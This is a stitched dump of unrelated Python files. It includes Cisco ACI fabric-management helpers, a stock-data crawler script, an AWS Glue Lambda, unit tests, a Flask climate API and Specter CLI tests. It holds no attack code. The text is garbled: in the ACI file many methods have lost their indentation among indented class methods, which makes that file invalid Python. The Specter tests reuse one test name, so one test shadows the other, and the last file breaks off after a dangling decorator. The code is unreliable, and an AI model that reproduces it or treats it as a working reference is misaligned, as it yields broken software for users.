            AttEntityP_mo = pd_list[0]
        # Assign attached entity profile
        self.commit(
            RsAttEntP(policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))
        )
        # Assign interface policies. For non-defaults, check if already created; if not, create them
        IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')
        if not IfPolmo:
            IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')
            self.commit(IfPolmo)
        self.commit(
            RsCdpIfPol(policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)
        )
        self.commit(
            RsHIfPol(policy_group_mo.dn, tnFabricHIfPolName='default')
        )
        self.commit(
            RsL2IfPol(policy_group_mo.dn, tnL2IfPolName='default')
        )
        # LACP active-mode policy for the bundle
        LagPolmo = self.moDir.lookupByDn('uni/infra/lacplagp-LACP')
        if not LagPolmo:
            LagPolmo = LagPol('uni/infra', 'LACP', mode='active')
            self.commit(LagPolmo)
        self.commit(
            RsLacpPol(policy_group_mo.dn, tnLacpLagPolName=LagPolmo.name)
        )
        self.commit(
            RsLldpIfPol(policy_group_mo.dn, tnLldpIfPolName='default')
        )
        self.commit(
            RsMcpIfPol(policy_group_mo.dn, tnMcpIfPolName='default')
        )
        self.commit(
            RsMonIfInfraPol(policy_group_mo.dn, tnMonInfraPolName='default')
        )
        self.commit(
            RsStormctrlIfPol(policy_group_mo.dn, tnStormctrlIfPolName='default')
        )
        self.commit(
            RsStpIfPol(policy_group_mo.dn, tnStpIfPolName='default')
        )
        return policy_group_mo
    def create_vpc_switch_profile(self, switch_dn, if_profile_dn, switch_p_name):
        """
        Create a virtual port channel switch profile for one switch and
        attach an interface profile to it.
        :param switch_dn: leaf switch distinguished name
        :param if_profile_dn: interface profile to attach
        :param switch_p_name: prefix for the switch profile name
        :return:
        """
        # Create switch profile named <switch_p_name><VPC_MIDDLE_STR><node rn>
        switch_mo = self.moDir.lookupByDn(switch_dn)
        switch_p_mo = NodeP('uni/infra/', switch_p_name + VPC_MIDDLE_STR + str(switch_mo.rn))
        self.commit(switch_p_mo)
        # Add switch selector with a node block covering exactly this node id
        switch_selector_mo = LeafS(str(switch_p_mo.dn), str(switch_mo.rn), 'range')
        self.commit(switch_selector_mo)
        node_block_mo = NodeBlk(switch_selector_mo.dn, str(switch_mo.rn) + NB_SUFIX, from_=switch_mo.id, to_=switch_mo.id)
        self.commit(node_block_mo)
        # Add interface profile
        rs_acc_port_p_mo = RsAccPortP(switch_p_mo.dn, if_profile_dn)
        self.commit(rs_acc_port_p_mo)
def get_vpc_assignments(self):
"""
Returns a dictionary: keys are VPC names and values are the list of EPGs that are associated to the it
"""
result = {}
class_query = ClassQuery('fvRsPathAtt')
# Filters the all the fvRsPathAtt in memory looking for the ones that are using a VPC
RsPathAtt_list = filter(lambda x: 'topology/pod-1/protpaths' in str(x.tDn),
self.moDir.query(class_query))
for RsPathAtt_mo in RsPathAtt_list:
vpc_name = str(RsPathAtt_mo.tDn).split('[')[1][:-1]
epg_mo = self.moDir.lookupByDn(RsPathAtt_mo.parentDn)
if vpc_name not in result.keys():
result[vpc_name] = []
result[vpc_name].append(epg_mo.name)
return result
def get_vpc_ports(self, vpc_dn):
"""
Returns all the ports that are part of an specific virtual port channel
:param vpc_dn:
:return:
"""
result = []
fabric_path_ep_mo = self.moDir.lookupByDn(vpc_dn)
# Filters the all the pcAggrIf objects in memory looking for the one that has the vpc name
pc_aggr_vpc_mo_list = filter(
lambda x: x.name == fabric_path_ep_mo.name, self.moDir.query(ClassQuery('pcAggrIf'))
)
for pc_aggr_vpc_mo in pc_aggr_vpc_mo_list:
# Filters all the children of the pc_aggr_vpc_mo in memory looking for the ones
# that are from the RsMbrIfs class
RsMbrIfs_mo_list = filter(
lambda x: type(x).__name__ == 'RsMbrIfs', self.query_child_objects(str(pc_aggr_vpc_mo.dn))
)
for RsMbrIfs_mo in RsMbrIfs_mo_list:
result.append(RsMbrIfs_mo)
return result
def get_switch_by_vpc_port(self, rsmbrifs_dn):
"""
Return the switch that an specific virtual port channel port is part of
:param rsmbrifs_dn:
:return:
"""
vpc_port_mo = self.moDir.lookupByDn(rsmbrifs_dn)
switch_vpc_mo = self.moDir.lookupByDn(vpc_port_mo.parentDn)
switch_sys_mo = self.moDir.lookupByDn(switch_vpc_mo.parentDn)
switch_mo = self.moDir.lookupByDn(switch_sys_mo.parentDn)
return switch_mo
    def delete_vpc(self, vpc_dn):
        """
        Remove the interface policy group, interface profiles and switch
        profiles that belong to a virtual port channel.
        :param vpc_dn: VPC distinguished name
        :return:
        """
        vpc_mo = self.moDir.lookupByDn(vpc_dn)
        # Find the bundle group (policy group) whose name equals the VPC name
        # and take the first match (raises IndexError if none exists)
        AccBndlGrp_mo = filter(lambda x: x.name == vpc_mo.name, self.moDir.query(ClassQuery('infraAccBndlGrp')))[0]
        # Delete policy group
        AccBndlGrp_mo.delete()
        self.commit(AccBndlGrp_mo)
        # Find the interface profiles whose name contains <vpc name><VPC>
        AccPortP_mo_list = filter(
            lambda x: vpc_mo.name + VPC in x.name, self.moDir.query(ClassQuery('infraAccPortP'))
        )
        for AccPortP_mo in AccPortP_mo_list:
            # Delete interface profiles
            AccPortP_mo.delete()
            self.commit(AccPortP_mo)
        # Find the switch profiles related to the VPC.
        # NOTE(review): this predicate (`vpc_mo.name in x.name + VPC`) appends VPC to
        # the candidate's name before the substring test, unlike the interface-profile
        # filter above (`vpc_mo.name + VPC in x.name`); the operand order looks
        # transposed — confirm against the naming used in create_vpc_switch_profile.
        NodeP_mo_list = filter(
            lambda x: vpc_mo.name in x.name + VPC, self.moDir.query(ClassQuery('infraNodeP'))
        )
        for NodeP_mo in NodeP_mo_list:
            # Delete switch profile
            NodeP_mo.delete()
            self.commit(NodeP_mo)
def get_available_ports(self, switch_dn):
"""
Search ports that are not VPC bundled
:return:
"""
# Get switch
switch_mo = self.moDir.lookupByDn(switch_dn)
# Get all switch ports
switch_port_list = self.get_ports(switch_dn)
# Get all VPCs
vpc_list = self.get_vpcs()
# Traverse the VPCs searching matches in VPCs' ports and switch's ports.
for vpc_mo in vpc_list:
vpc_port_list = self.get_vpc_ports(str(vpc_mo.dn))
for vpc_port_mo in vpc_port_list:
vpc_switch_mo = self.get_switch_by_vpc_port(str(vpc_port_mo.dn))
if str(vpc_switch_mo.rn) == str(switch_mo.rn):
for i in range(0, len(switch_port_list[1]) - 1):
if switch_port_list[1][i] == vpc_port_mo.tSKey:
# removes the item from the two lists. See get_ports method
del switch_port_list[1][i]
del switch_port_list[0][i]
return switch_port_list
def create_vlan_pool(self, vlan_pool_name, allocation_mode):
"""
Creates a vlan pool within the fabric
:param vlan_pool_name:
:param allocation_mode:
:return:
"""
VlanInstP_mo = VlanInstP('uni/infra/', vlan_pool_name, allocation_mode)
self.commit(VlanInstP_mo)
return VlanInstP_mo
def create_physical_domain(self, physical_domain_name, vlan_pool_dn):
"""
Creates a physical domain within the fabric
:param physical_domain_name:
:param vlan_pool_dn:
:return:
"""
DomP_mo = DomP('uni/', physical_domain_name)
self.commit(DomP_mo)
if vlan_pool_dn is not None:
RsVlanNs_mo = RsVlanNs(DomP_mo.dn)
RsVlanNs_mo.tDn = vlan_pool_dn
self.commit(RsVlanNs_mo)
return DomP_mo
def create_attachable_entity_profile(self, name, physical_domain_dn):
"""
Creates an attachable entity profile
:param name:
:param physical_domain_dn: if it is not None, will assign it to the AEP
:return:
"""
AttEntityP_mo = AttEntityP('uni/infra/', name)
self.commit(AttEntityP_mo)
if physical_domain_dn is not None:
RsDomP_mo = RsDomP(AttEntityP_mo.dn, physical_domain_dn)
self.commit(RsDomP_mo)
return AttEntityP_mo
    def create_explicit_vpc_pgroup(self, pgroup_name, leaf_1_dn, leaf_2_dn):
        """
        Create an explicit virtual port channel protection group pairing two
        leaves. This is a prerequisite to create a virtual port channel.
        :param pgroup_name: protection group name
        :param leaf_1_dn: first leaf distinguished name
        :param leaf_2_dn: second leaf distinguished name
        :return: the committed fabricProtPol managed object
        """
        fabric = self.moDir.lookupByDn('uni/fabric')
        fabricProtPol = ProtPol(fabric, pairT='explicit')
        fabricExplicitGEp = ExplicitGEp(fabricProtPol, name=pgroup_name, id=1)
        # The two NodePEp children attach themselves to the group on construction
        NodePEp(fabricExplicitGEp, id=self.moDir.lookupByDn(leaf_1_dn).id)
        NodePEp(fabricExplicitGEp, id=self.moDir.lookupByDn(leaf_2_dn).id)
        self.commit(fabricProtPol)
        # Find the RsVpcInstPol child of the group and take the first one
        RsVpcInstPol_mo = filter(
            lambda x: type(x).__name__ == 'RsVpcInstPol',
            self.query_child_objects(str(fabricExplicitGEp.dn))
        )[0]
        # Reset the relation to the default VPC instance policy
        RsVpcInstPol_mo.stateQual = None
        RsVpcInstPol_mo.tnVpcInstPolName = 'default'
        self.commit(RsVpcInstPol_mo)
        return fabricProtPol
def get_vpc_explicit_groups(self):
"""
Returns explicit groups created in the fabric
:return:
"""
class_query = ClassQuery('fabricExplicitGEp')
return self.moDir.query(class_query)
    def get_leaf_by_explicit_group(self, fabricExplicitGEp_dn):
        """
        Return the leaf switches that are part of an explicit protection group
        as a two-item list: [list of leaf dns, list of leaf rns].
        :param fabricExplicitGEp_dn: dn of the protection group
        """
        # Three lists: one for the result, one for distinguished names and one
        # for relative names (dns[i] and rns[i] describe the same leaf)
        result = []
        dns = []
        rns = []
        leafs = self.get_leafs()
        # The NodePEp children of the group carry the member node ids
        NodePEp_list = filter(lambda x: type(x).__name__ == 'NodePEp', self.query_child_objects(fabricExplicitGEp_dn))
        for NodePEp_mo in NodePEp_list:
            for i in range(0, len(leafs[0])):
                # leaf rn looks like 'node-<id>'; match its id against the member id
                if leafs[1][i].split('-')[1] == NodePEp_mo.id:
                    dns.append(leafs[0][i])
                    rns.append(leafs[1][i])
        result.append(dns)
        result.append(rns)
        return result
def remove_vpc_group(self, fabricExplicitGEp_dn):
"""
Removes a explicit protection group
:param fabricExplicitGEp_dn:
:return:
"""
fabricExplicitGEp_mo = self.moDir.lookupByDn(fabricExplicitGEp_dn)
fabricExplicitGEp_mo.delete()
self.commit(fabricExplicitGEp_mo)
def create_vrf(self, parent_dn, vrf_name):
"""
Creates a virtual routing forwarding context
:param parent_dn:
:param vrf_name:
:return:
"""
Ctx_mo = Ctx(parent_dn, vrf_name)
self.commit(Ctx_mo)
return Ctx_mo
def get_fabric_switches(self):
"""
Returns all switches within the fabric
:return:
"""
# Leafs
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "leaf")'
leafs = self.moDir.query(class_query)
# Two lists are created, one for the distinguished names and other for the relative names
dns = []
rns = []
for leaf in leafs:
dns.append(str(leaf.dn))
rns.append(str(leaf.rn))
# Spines
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "spine")'
spines = self.moDir.query(class_query)
for spine in spines:
dns.append(str(spine.dn))
rns.append(str(spine.rn))
# Need to be human sorted (e.g 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
rns.sort(key=natural_keys)
return dns, rns
def get_health_dashboard(self):
"""
Returns the switches health information
:return: A dictionary that contains dictionaries. Each key is a switch
"""
result = {}
fabric_switches_dns, fabric_switches_rns = self.get_fabric_switches()
for fabric_switch in fabric_switches_rns:
result[fabric_switch] = {}
# Switch health
Health_Inst_mo = self.moDir.lookupByDn('topology/pod-1/' + fabric_switch + '/sys/health')
result[fabric_switch]['Health'] = Health_Inst_mo.cur
# Switch Policy CAM table
cam_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityPolUsage5min')
result[fabric_switch]['Policy CAM table'] = cam_usage_mo.polUsageCum + ' of ' + cam_usage_mo.polUsageCapCum
# Switch MAC table
multicast_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityMcastUsage5min')
result[fabric_switch]['Multicast'] = multicast_usage_mo.localEpCum + ' of ' + multicast_usage_mo.localEpCapCum
# VLAN
vlan_usage_mo = self.moDir.lookupByDn('topology/pod-1/' + str(fabric_switch) +
'/sys/eqptcapacity/CDeqptcapacityVlanUsage5min')
result[fabric_switch]['VLAN'] = vlan_usage_mo.totalCum + ' of ' + vlan_usage_mo.totalCapCum
return result
def get_system_health(self):
"""
Returns the system health
:return:
"""
HealthTotal_mo = self.moDir.lookupByDn('topology/health')
return HealthTotal_mo.cur
    def get_endpoints(self, epg_dn):
        """
        Return the endpoints (fvCEp) attached to an EPG.

        Each returned entry is a dynamically created class object carrying
        ip, mac, name and a human-readable interface string as attributes.

        :param epg_dn: distinguished name of the EPG
        :return: list of endpoint objects
        """
        result = []
        for item in filter(lambda x: type(x).__name__ == 'CEp', self.query_child_objects(epg_dn)):
            # Creates a dynamic object type.
            # NOTE(review): type(...) returns a *class*, not an instance; the
            # attributes below are set on that class object. Works, but unusual.
            endpoint = type('endpoint', (object,), {})
            # Filter the endpoint in memory looking for the object that contains the interface where the endpoint is
            # attached
            # NOTE(review): filter(...)[0] only works on Python 2; Python 3
            # would need list(filter(...))[0].
            endpoint_connection_mo = filter(lambda x: type(x).__name__ == 'RsCEpToPathEp',
                                            self.query_child_objects(item.dn))[0]
            # Format the string to be human readable
            endpoint_connection_interface = str(endpoint_connection_mo.tDn).replace('topology/pod-1/paths','node').\
                replace('pathep-[', '').replace(']','')
            # Add attributes to the object
            endpoint.ip = item.ip
            endpoint.mac = item.mac
            endpoint.name = item.name
            endpoint.interface = endpoint_connection_interface
            # Append it to the list
            result.append(endpoint)
        return result
def get_epg_health_score(self, epg_dn):
return self.moDir.lookupByDn(epg_dn + '/health').cur
def get_epg(self, tenant_name, ap_name, epg_name):
"""
Retrieves the epg
:param tenant_name:
:param ap_name:
:param epg_name:
:return:
"""
ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == ap_name,
self.query_child_objects('uni/tn-%s' % tenant_name))
if len(ap_list) > 0:
epg_list = filter(lambda x: type(x).__name__ == 'AEPg' and x.name == epg_name,
self.query_child_objects(str(ap_list[0].dn)))
if len(epg_list) > 0:
return epg_list[0]
def get_faults_history(self, epg_dn):
"""
Retrieves a historic list of all faults associated to an EPG
:param epg_dn:
:return:
"""
class_query = ClassQuery('faultRecord')
class_query.propFilter = 'eq(faultRecord.affected, "' + epg_dn + '")'
return self.moDir.query(class_query)
def get_stats(self, epg_dn):
"""
Get all traffic statistics of an EPG
:param epg_dn:
:return:
"""
# Apic saves up to 95 different objects with statistic information
traffic_list = []
for i in range(10, -1, -1):
traffic = self.moDir.lookupByDn(epg_dn + '/HDl2IngrBytesAg15min-%s' % str(i))
if traffic is not None:
traffic_list.append(traffic)
return traffic_list
def get_faults(self, epg_dn):
class_query = DnQuery(epg_dn)
class_query.subtree = 'full'
class_query.subtreeInclude = 'faults'
epg_list = self.moDir.query(class_query)
fault_list = self.get_faults_from_tree(epg_list[0], [])
return fault_list
def get_faults_from_tree(self, mo, faults):
if type(mo).__name__ == 'Inst':
faults.append(mo)
for child in mo.children:
self.get_faults_from_tree(child, faults)
return faults
def get_nca_ap(self, tenant_dn):
aps = self.get_ap_by_tenant(tenant_dn)
for ap in aps:
if ap.name == AP_NAME:
return ap
    def assign_any_to_any_contract(self, network_o):
        """
        Wire up a permit-any contract for a network: create the contract, an
        ip-any filter/entry/subject, and bind the contract to the network's EPG.

        :param network_o: object exposing .group (tenant/group DN) and .epg_dn
        """
        contract_mo = self.create_contract(network_o.group, ANY_TO_ANY_CONTRACT_NAME)
        filter_mo = self.create_filter(network_o.group,ANY_TO_ANY_FILTER_NAME)
        # Entry matches the whole 'ip' ether type, i.e. all IP traffic.
        self.create_entry(filter_mo.dn, ANY_TO_ANY_ENTRY_NAME, 'ip')
        self.create_subject(filter_mo.dn, contract_mo.dn, ANY_TO_ANY_SUBJ_NAME)
        # NOTE(review): contract_mo.dn is passed twice — presumably as both the
        # provided and consumed contract; confirm against assign_contract's signature.
        self.assign_contract(network_o.epg_dn, contract_mo.dn, contract_mo.dn)
| StarcoderdataPython |
1871183 | <reponame>allenyummy/GoodInfo<filename>src/entry_goodinfo.py
# encoding=utf-8
# Author: <NAME>
# Description: Example code
import argparse
import logging
import os
import sys
from tqdm import tqdm
from src.utils.struct import GoodInfoStruct
from src.utils.utility import readJson, writeJson
from src.crawler.goodinfo.goodinfo import get_code_name, get_basic
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
datefmt="%Y-%m-%d %H:%M",
)
logger = logging.getLogger(__name__)
def parse_args(argv=None):
    """
    Build and run the command-line parser for the Good Info crawler.

    :param argv: optional list of argument strings; defaults to sys.argv[1:].
                 (Parameter added, backward-compatibly, so the parser can be
                 exercised in tests without touching sys.argv.)
    :return: argparse.Namespace with output_file and cache_file attributes
    """
    parser = argparse.ArgumentParser(description="Web Crawler for Good Info.")
    parser.add_argument(
        "-o",
        "--output_file",
        type=str,
        help="output file to store the results",
    )
    parser.add_argument(
        "-c",
        "--cache_file",
        type=str,
        help="read cache file to accelerate the program",
    )
    args = parser.parse_args(argv)
    return args
def main():
    """Crawl goodinfo basic data for every stock code, with periodic checkpoints."""
    """Args"""
    args = parse_args()
    logger.info(f"ARGS: {args}\n")
    """ Get basic from cache """
    # Cache file (if given) seeds the run; otherwise start from the code list.
    cache = None
    if args.cache_file:
        cache = readJson(infile=args.cache_file)
        cache = [GoodInfoStruct(**c) for c in cache]
    else:
        cache = get_code_name()
    """ Get basic from goodinfo website """
    data = list()
    for i, c in enumerate(
        tqdm(
            cache,
            total=(len(cache)),
            desc="Get Basic Info",
        )
    ):
        try:
            # Entries that already carry a company name are complete; only
            # fetch from the website for the rest.
            if c.公司名稱:
                goodinfo = c
            else:
                goodinfo = get_basic(c.股票代號)
        except Exception as e:
            logger.error(f"{c.股票代號}, {e}")
            """ Write data """
            # On failure: persist everything fetched so far plus the untouched
            # remainder of the cache (from index i), then abort the run.
            if args.output_file:
                os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
                writeJson(
                    data=[d.__2dict__() for d in data]
                    + [c.__2dict__() for c in cache[i:]],
                    outfile=args.output_file,
                )
            sys.exit()
        else:
            data.append(goodinfo)
            # Checkpoint every 50 records so progress survives a crash.
            if i > 0 and i % 50 == 0:
                logger.info(f"write file to {i}")
                """ Write data """
                if args.output_file:
                    os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
                    writeJson(
                        data=[d.__2dict__() for d in data]
                        + [c.__2dict__() for c in cache[i + 1 :]],
                        outfile=args.output_file,
                    )
    """ Write data """
    # Final write: only the freshly assembled data.
    if args.output_file:
        os.makedirs(os.path.dirname(args.output_file), exist_ok=True)
        writeJson(
            data=[d.__2dict__() for d in data],
            outfile=args.output_file,
        )
if __name__ == "__main__":
main()
| StarcoderdataPython |
12802863 | import boto3
GLUE = boto3.client('glue')
def lambda_handler(event, context):
    """
    Start the named Glue crawler if it is idle; otherwise just report its state.

    :param event: dict containing "crawler_name"
    :param context: Lambda context object (unused)
    :return: shallow copy of the incoming event
    """
    name = event["crawler_name"]
    state = GLUE.get_crawler(Name=name)['Crawler']['State']
    if state == 'READY':
        GLUE.start_crawler(Name=name)
        print("Crawler [{}] started".format(name))
    else:
        print("Crawler [{}] currently in state [{}], could not trigger a new run.".format(name, state))
    return {**event}
| StarcoderdataPython |
8135070 | import unittest
from core.workflow_manager import WorkflowManager
from uuid import uuid4
class TestDialog:
    """Minimal stand-in for a dialog: only carries an id."""

    def __init__(self, id):
        self.id = id
class TestService:
    """Minimal stand-in for a service: only carries a name."""

    def __init__(self, name):
        self.name = name
class TestWorkflowManagerDialog(unittest.TestCase):
    """Unit tests for WorkflowManager's dialog and task bookkeeping."""
    def setUp(self):
        # Every test starts with exactly one registered dialog.
        self.workflow = WorkflowManager()
        self.dialog_id = uuid4().hex
        self.workflow.add_workflow_record(TestDialog(self.dialog_id))
    def test_internal_params(self):
        """The registered dialog is the only workflow record."""
        self.assertTrue(self.dialog_id in self.workflow.workflow_records)
        self.assertEqual(1, len(self.workflow.workflow_records))
    def test_get_record(self):
        """Lookup by id returns the same dialog."""
        self.assertEqual(self.workflow.get_dialog_by_id(self.dialog_id).id, self.dialog_id, "get_dialog works wrong")
    def test_add_another_dialog(self):
        """A second dialog coexists with the first."""
        another_dialog_id = uuid4().hex
        self.workflow.add_workflow_record(TestDialog(another_dialog_id))
        self.assertTrue(self.dialog_id in self.workflow.workflow_records)
        self.assertTrue(another_dialog_id in self.workflow.workflow_records)
        self.assertEqual(2, len(self.workflow.workflow_records))
    def test_add_duplicate_dialog(self):
        """Registering the same dialog id twice must raise ValueError."""
        with self.assertRaises(ValueError):
            self.workflow.add_workflow_record(TestDialog(self.dialog_id))
    def test_flush_record(self):
        """Flushing returns the record dict containing the dialog."""
        workflow_record = self.workflow.flush_record(self.dialog_id)
        self.assertTrue(isinstance(workflow_record, dict))
        self.assertEqual(workflow_record["dialog"].id, self.dialog_id)
    def test_add_task(self):
        """Adding a task yields an id and stores the task."""
        payload = uuid4().hex
        task_service = TestService("testservice")
        task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
        self.assertTrue(task_id is not None)
        self.assertEqual(1, len(self.workflow.tasks))
        self.assertTrue(task_id in self.workflow.tasks)
    def test_complete_task(self):
        """Completing a task returns its record and the owning dialog record."""
        payload = uuid4().hex
        response = "123"
        task_service = TestService("testservice")
        task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
        workflow_record, task = self.workflow.complete_task(task_id, response)
        self.assertTrue(isinstance(task, dict))
        self.assertTrue(isinstance(workflow_record, dict))
        self.assertEqual(task["service"].name, task_service.name)
        self.assertEqual(task["dialog"], workflow_record["dialog"].id)
    def test_double_complete_task(self):
        """Completing the same task twice yields (None, None) the second time."""
        payload = uuid4().hex
        response = "123"
        task_service = TestService("testservice")
        task_id = self.workflow.add_task(self.dialog_id, task_service, payload, 1)
        self.workflow.complete_task(task_id, response)
        workflow_record, task = self.workflow.complete_task(task_id, response)
        self.assertTrue(workflow_record is None)
        self.assertTrue(task is None)
    def test_next_tasks(self):
        """done/waiting/skipped service names are reported correctly."""
        payload = uuid4().hex
        response = "123"
        done_service = TestService(uuid4().hex)
        waiting_service = TestService(uuid4().hex)
        skipped_service = TestService(uuid4().hex)
        self.workflow.skip_service(self.dialog_id, skipped_service)
        task_id = self.workflow.add_task(self.dialog_id, done_service, payload, 1)
        self.workflow.complete_task(task_id, response)
        self.workflow.add_task(self.dialog_id, waiting_service, payload, 1)
        done, waiting, skipped = self.workflow.get_services_status(self.dialog_id)
        self.assertTrue(done_service.name in done)
        self.assertTrue(waiting_service.name in waiting)
        self.assertTrue(skipped_service.name in skipped)
    def test_flush(self):
        """A task completed after its dialog is flushed is reported as late."""
        payload = uuid4().hex
        response = "123"
        done_service = TestService(uuid4().hex)
        waiting_service = TestService(uuid4().hex)
        skipped_service = TestService(uuid4().hex)
        self.workflow.skip_service(self.dialog_id, skipped_service)
        done_task_id = self.workflow.add_task(self.dialog_id, done_service, payload, 1)
        self.workflow.complete_task(done_task_id, response)
        waiting_task_id = self.workflow.add_task(self.dialog_id, waiting_service, payload, 1)
        workflow_record = self.workflow.flush_record(self.dialog_id)
        self.assertEqual(self.dialog_id, workflow_record["dialog"].id)
        workflow_record, late_task = self.workflow.complete_task(waiting_task_id, response)
        self.assertEqual(self.dialog_id, workflow_record["dialog"].id)
        self.assertTrue("dialog" in late_task)
        self.assertEqual(self.dialog_id, late_task["dialog"])
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3303628 | from django.contrib import admin
from django.urls import include, path
# URL routing table: the Django admin plus the price API mounted under /api/
# in the 'priceapi' application namespace.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/', include(('priceapi.urls', 'priceapi'), namespace='priceapi')),
]
| StarcoderdataPython |
321702 | from flask import Flask, jsonify
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
from sqlalchemy import create_engine, func
# Reflect the Hawaii SQLite database and automap its tables to classes.
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
# Table handles produced by the automap reflection.
Measurement = Base.classes.measurement
Station = Base.classes.station
app=Flask(__name__)
@app.route("/")
def home():
    """Landing page: list the available API routes."""
    routes = (
        "Welcome to my Climate Analysis API!<br/>"
        "Available Routes:<br/>"
        "/api/v1.0/precipitation<br/>"
        "/api/v1.0/stations<br/>"
        "/api/v1.0/tobs<br/>"
        "/api/v1.0/<start-date><br/>"
        "/api/v1.0/<start-date>/<end-date><br/>"
    )
    return routes
@app.route("/api/v1.0/precipitation")
def precipitation():
    """Return the last year of precipitation readings as a JSON list of
    {date, prcp} dicts."""
    session = Session(engine)
    # NOTE(review): the comparison is against the *string* 'None', not SQL
    # NULL — presumably meant to drop missing readings; confirm the column
    # type and whether isnot(None) was intended.
    precips = session.query(Measurement.date, Measurement.prcp)\
        .filter((Measurement.date > '2016-08-22') & (Measurement.prcp != 'None')).all()
    session.close()
    precipitation = []
    for date, prcp in precips:
        precip_dict={}
        precip_dict['date'] = date
        precip_dict['prcp'] = prcp
        precipitation.append(precip_dict)
    return jsonify(precipitation)
@app.route("/api/v1.0/stations")
def stations():
    """Return the list of station identifiers as JSON."""
    session = Session(engine)
    station_ids = [row.station for row in session.query(Station).all()]
    session.close()
    return jsonify(station_ids)
@app.route("/api/v1.0/tobs")
def tobs():
    """Return a year of temperature observations for station USC00519281."""
    session = Session(engine)
    rows = session.query(Measurement.station, Measurement.date, Measurement.tobs)\
        .filter(Measurement.station == 'USC00519281').filter(Measurement.date > '2016-08-22').all()
    session.close()
    observations = [row for row in rows]
    return jsonify(observations)
@app.route("/api/v1.0/<start>/<end>")
def start_end(start, end):
    """Return [min, avg, max] temperature between *start* and *end* (inclusive)."""
    session = Session(engine)
    stats = session.query(
        func.min(Measurement.tobs),
        func.avg(Measurement.tobs),
        func.max(Measurement.tobs),
    ).filter(Measurement.date >= start).filter(Measurement.date <= end).all()
    session.close()
    return jsonify(stats)
@app.route("/api/v1.0/<start>")
def start(start):
    """Return [min, avg, max] temperature from *start* date onward."""
    session = Session(engine)
    stats = session.query(
        func.min(Measurement.tobs),
        func.avg(Measurement.tobs),
        func.max(Measurement.tobs),
    ).filter(Measurement.date >= start).all()
    session.close()
    return jsonify(stats)
if __name__ == "__main__":
app.run(debug=False) | StarcoderdataPython |
6459192 | import logging
from cryptoadvance.specter.cli import server
from click.testing import CliRunner
import sys
import traceback
import mock
from mock import patch, MagicMock, call
# Shared fake Flask-config dict, used as the side_effect for the mocked
# app.config.__getitem__ in the CLI tests below.
mock_config_dict = {
    "PORT": "123",
    "DEBUG": "WURSTBROT",
    "SPECTER_SSL_CERT_SUBJECT_C": "AT",
    "SPECTER_SSL_CERT_SUBJECT_ST": "Blub",
    "SPECTER_SSL_CERT_SUBJECT_L": "Blub",
    "SPECTER_SSL_CERT_SUBJECT_O": "Blub",
    "SPECTER_SSL_CERT_SUBJECT_OU": "Blub",
    "SPECTER_SSL_CERT_SUBJECT_CN": "Blub",
    "SPECTER_SSL_CERT_SERIAL_NUMBER": 123,
    # We don't want to make a more sophisticated mock, so we simply set here
    # the same value we set via CMD-Line
    "CERT": "bla",
    "KEY": "blub",
}
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_host_and_port(init_app, create_app, caplog):
    """--port/--host must reach app.config and app.run.

    NOTE(review): a second function with this exact name is defined further
    down in this module; it shadows this one, so pytest never collects or
    runs this test body. Rename one of the two.
    """
    caplog.set_level(logging.DEBUG)
    mock_app = MagicMock()
    mock_app.config = MagicMock()
    d = mock_config_dict
    mock_app.config.__getitem__.side_effect = d.__getitem__
    create_app.return_value = mock_app
    runner = CliRunner()
    result = runner.invoke(server, ["--port", "456", "--host", "0.0.0.1"])
    print(result.output)
    if result.exception != None:
        # Makes searching for issues much more convenient
        traceback.print_tb(result.exception.__traceback__)
        print(result.exception, file=sys.stderr)
    print(mock_app.config.mock_calls)
    assert result.exit_code == 0
    mock_app.config.__setitem__.assert_called_with("PORT", 456)
    mock_app.run.assert_called_with(
        debug="WURSTBROT", host="0.0.0.1", port="123", extra_files=["templates"]
    )
@patch("cryptoadvance.specter.cli.cli_server.create_app")
@patch("cryptoadvance.specter.cli.cli_server.init_app")
def test_server_cert_and_key(init_app, create_app, caplog):
    """--cert/--key must land in the app config and in the ssl_context.

    Renamed from test_server_host_and_port: the module defined that name
    twice, so this body silently shadowed the first test and pytest only
    ever ran this one. Also dropped the no-op
    ``mock_app.config.__setitem__.call_count = 2`` line — it *assigned*
    to the mock attribute instead of asserting anything.
    """
    caplog.set_level(logging.DEBUG)
    mock_app = MagicMock()
    mock_app.config = MagicMock()
    mock_app.config.__getitem__.side_effect = mock_config_dict.__getitem__
    create_app.return_value = mock_app
    runner = CliRunner()
    with runner.isolated_filesystem():
        result = runner.invoke(server, ["--cert", "bla", "--key", "blub"])
        print(result.output)
        if result.exception is not None:
            # Makes searching for issues much more convenient
            traceback.print_tb(result.exception.__traceback__)
            print(result.exception, file=sys.stderr)
        assert result.exit_code == 0
        print(mock_app.config.mock_calls)
        # Both TLS settings must have been stored in the app config.
        mock_app.config.__setitem__.assert_called_with("KEY", "blub")
        mock_app.config.__setitem__.assert_any_call("CERT", "bla")
        # The tmp-directory differs between runs, so only the filename suffix
        # of the ssl_context tuple can be checked.
        print(mock_app.run.call_args.kwargs)
        assert mock_app.run.call_args.kwargs["ssl_context"][0].endswith("bla")
        assert mock_app.run.call_args.kwargs["ssl_context"][1].endswith("blub")
@patch("cryptoadvance.specter.cli.cli_server.create_app")
